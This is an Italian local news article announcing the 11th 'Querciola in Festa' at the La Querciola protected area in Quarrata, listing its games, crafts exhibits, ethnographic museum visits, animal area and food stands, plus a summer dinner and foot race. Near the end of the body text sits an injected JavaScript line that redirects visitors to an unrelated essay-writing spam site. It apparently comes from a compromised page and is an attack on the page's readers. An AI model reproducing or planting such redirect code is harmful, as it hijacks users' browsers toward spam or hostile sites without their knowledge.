QUERCIOLA IN FESTA 11

Il lago di Zela alla Querciola di Quarrata
Il lago di Zela alla Querciola di Quarrata

QUARRATA. [a.b.] Saranno tre gli eventi che si terranno nel periodo estivo nell’area protetta La Querciola. A organizzarli come sempre l’associazione Amici della Querciola. Il primo appuntamento è imminente, si tratta della undicesima edizione di “Querciola in Festa-giochi dimenticati a contatto con la natura” in programma domenica 22 giugno; il prossimo 5 luglio sarà ripetuta la “Cena nell’aia” (giunta alla quinta edizione.

Per prenotazioni: 334-6610341) e il 19 luglio torna la corsa podistica “6° Trofeo verde Città di Quarrata”, gara podistica in collaborazione con l’associazione podistica La Stanca e il Club degli Atleti all’interno dell’area Protetta.

Per domenica come sempre è previsto un programma ricco e variegato di iniziative tutte organizzate dall’associazione Amici della Querciola con il patrocinio del Comune e dell’associazione Anter. Tornano visto il grande riscontro delle passate edizioni le visite didattiche, mostre, passeggiate, ma anche i laboratori con grande spazio ai giochi.

La casa di Zela
La casa di Zela

A partire dalle ore 16 in via Nuova tra Casini e Caserana tante le occasioni per trascorrere all’aria aperta l’intero pomeriggio visitando le diverse aree tematiche che saranno allestite attorno alla Casa di Zela, sede del “Museo etnografico della civiltà contadina e antichi mestieri” che rimarrà aperto con la guida d’eccezione di Ernesto Franchi che è il collezionista che ha donato tutto il materiale oppure i laghi presenti nell’area protetta approfittando della disponibilità delle Guide Ambientali Escursionistiche del C.R.D. Padule di Fucecchio (con partenze dalla ore 16 dal gazebo degli Amici della Querciola ogni 30 minuti).

Saranno anche esposte le Sculture di pietra a cura di Franco Biagini; l’oggettistica artigianale in legno a cura di Virgilio Giagnoni; una mostra di giocattoli di legno a cura di Lorenzo Vezzosi; il Laboratorio di ricamo del Filet a Modano; lo stand della Birrificazione su ricette storiche a cura dell’Associazione Culturale Historiaedita e lo spazio “L’artista dell’intreccio di pagni, vimini e midollino” a cura di Antonio Schipani. Nell’area “Animali” ci saranno papere, galline e caprette. Saranno presentati anche Giochi motori a cavallo per bambini a cura dell’associazione Fite-Trec Ante Toscana e Atvf.

Il dépliant
Il dépliant

Per i bambini (soprattutto) ma anche per i grandi che potranno giocare con i loro figli o nipoti è riservata invece l’area “Giochi” in cui saranno proposte molte attività all’aperto, tra cui “Costruisci le girandole” in compagnia con l’associazione Amici della Querciola, “Costruisci gli aquiloni” con l’associazione Girovolando di Mario ed Elisabetta, “Colora la Natura in Querciola” con l’associazione Carnevale “Maschere e colori”.

È prevista anche la settima edizione della mini olimpiade della Querciola con l’associazione Il Club degli Atleti (inizio ore 17), il tiro al bersaglio con barattolo, tiro con i fucilini con l’elastico, tiro al cerchietto a cura dell’associazione Amici della Querciola con materiale di Ernesto Franchi. Inoltre saranno presenti anche “Le frecce del Micco” a cura dell’associazione Arcieri del Micco.

Nell’area “Gusta” saranno presenti stand con produttori (con vendita diretta di prodotti coltivati in terreni di origine biologica di “Canto di Primavera del sogno antico”) e distributori dove sarà possibile assaggiare il gelato di Francesco Cassano, i salumi toscani de I Menici, i panini del gruppo dei Cacciatori del lago di Zela”.
window.location = “http://paper-help24h.com”;

Sostenete questo quotidiano con un piccolo contributo attraverso bonifico intestato a

«Linee Stampalibera» Iban IT08V0306913833100000001431 su CariPt di Porta San Marco-Pistoia. Riceverete informazioni senza censure!

Print Friendly, PDF & Email

Lascia un commento